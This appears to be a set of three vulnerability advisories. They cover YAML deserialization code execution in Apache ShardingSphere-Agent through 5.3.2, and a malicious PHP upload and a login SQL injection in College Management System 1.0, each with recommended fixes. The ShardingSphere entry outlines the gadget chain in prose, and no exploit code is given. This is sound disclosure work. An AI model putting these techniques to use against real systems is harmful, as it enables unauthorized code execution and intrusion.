Liav Gutman

**Name of the Vulnerable Software and Affected Versions** ShardingSphere-Agent versions through 5.3.2 **Description** The Deserialization of Untrusted Data issue in Apache ShardingSphere-Agent allows attackers to execute arbitrary code by constructing a special YAML configuration file. An attacker must have permission to modify the ShardingSphere Agent YAML configuration file on the target machine, and the target machine must be able to access the URL with the arbitrary code JAR. The attacker can use SnakeYAML to deserialize `java.net.URLClassLoader` and make it load a JAR from a specified URL, and then deserialize `javax.script.ScriptEngineManager` to load code using that ClassLoader. When the ShardingSphere JVM process starts and uses the ShardingSphere-Agent, the arbitrary code specified by the attacker will be executed during the deserialization of the YAML configuration file by the Agent. **Recommendations** For ShardingSphere-Agent versions through 5.3.2, update to Apache ShardingSphere 5.4.0 to fix the vulnerability. As a temporary workaround, consider restricting access to the ShardingSphere Agent YAML configuration file to prevent modification by unauthorized users. Additionally, restrict the target machine's access to URLs with arbitrary code JARs to minimize the risk of exploitation.

**Name of the Vulnerable Software and Affected Versions** College Management System version 1.0 **Description** The issue allows an admin user to upload a .php file containing malicious code via the student.php file, potentially leading to remote code execution. The authentication required for this action can be bypassed using SQL Injection, as mentioned in another report. **Recommendations** For College Management System version 1.0, consider disabling the upload functionality in the student.php file until a patch is available to prevent the upload of malicious .php files. Restrict access to the student.php file to minimize the risk of exploitation. Avoid using the student.php file for uploading any files until the issue is resolved.

**Name of the Vulnerable Software and Affected Versions** College Management System version 1.0 **Description** The issue allows for SQL Injection (SQLi) by inserting SQL commands into the `username` and `password` fields in the "login.php" page. **Recommendations** For College Management System version 1.0, as a temporary workaround, consider restricting access to the "login.php" page or validating and sanitizing user input for the `username` and `password` fields to prevent SQL injection attacks. At the moment, there is no information about a newer version that contains a fix for this vulnerability.